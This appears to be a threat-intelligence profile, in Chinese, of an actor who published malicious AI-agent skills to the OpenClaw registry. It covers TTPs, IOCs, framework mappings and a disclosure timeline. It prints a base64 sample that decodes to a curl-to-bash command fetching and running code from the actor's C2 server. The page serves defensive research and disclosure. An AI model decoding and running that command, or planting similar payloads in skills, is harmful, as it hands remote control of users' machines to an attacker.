威脅行為者檔案
sakaen736jih
活躍中198 / 212 惡意 (93%)·首次發現 2026-04-11
三個行為者中手法最直接的一個。散佈內含 base64 編碼 curl-to-bash payload 的 skill,回呼 C2 伺服器 91.92.242.30 取得任意指令執行能力。
檔案概要
- 首次發現
- 2026-04-11
- 最新活動
- 2026-04-14
- 已發布 skill
- 212
- 惡意比例
- 198 / 212 (93%)
- 主要動機
- 透過 C2 回呼進行遠端程式碼執行;掌控被入侵的開發者機器
- 地理線索
- C2 基礎設施位於 91.92.242.30——無特定地區歸屬
戰術、技術、程序 (TTPs)
偽裝手法
- ▸圖像生成工具(例如「Nano Banana Pro」)
- ▸泛用 agent browser skill
Payload 遞送
- 01Base64 編碼 shell 指令,解碼後是 curl-to-bash C2 回呼。-fsSL 旗標抑制所有輸出,執行過程對使用者完全隱形。
入侵指標 (IOCs)
C2 伺服器
- 91.92.242.30
URLs
- http://91.92.242.30/tjjve9itarrd3txw
命名樣態
- agent-browser-*
Base64 樣本
L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC90amp2ZTlpdGFycmQzdHh3KSI=
在隔離環境下使用 `echo "..." | base64 -d` 解碼可還原原始 payload。
相關 ATR 規則
點擊規則 ID 可查看完整 YAML 定義、攻擊樣本與已記錄的規避手法。
框架對照
MITRE ATLAS
AML.T0010 · ML Supply Chain Compromise
OWASP LLM 2025
- LLM03 — Supply Chain Vulnerabilities
OWASP Agentic 2026
- ASI04 — Supply Chain Compromise
- ASI05 — Unexpected Code Execution
OWASP AST 2026
- AST01 — Malicious Skills
- AST02 — Supply Chain Compromise
受影響的 Registry
OpenClaw
212
個惡意 skill
時間線
- 2026-04-10開始掃描 OpenClaw registry。
- 2026-04-11首次偵測到協同發布的惡意行為者。
- 2026-04-12完成跨五個來源、共 96,096 個 skill 的完整掃描。
- 2026-04-13完成分析與行為者檔案建立。
- 2026-04-14研究報告發布;透過 issue #9809 通報 NousResearch。
通報狀態
- NousResearch/hermes-agent#9809 →open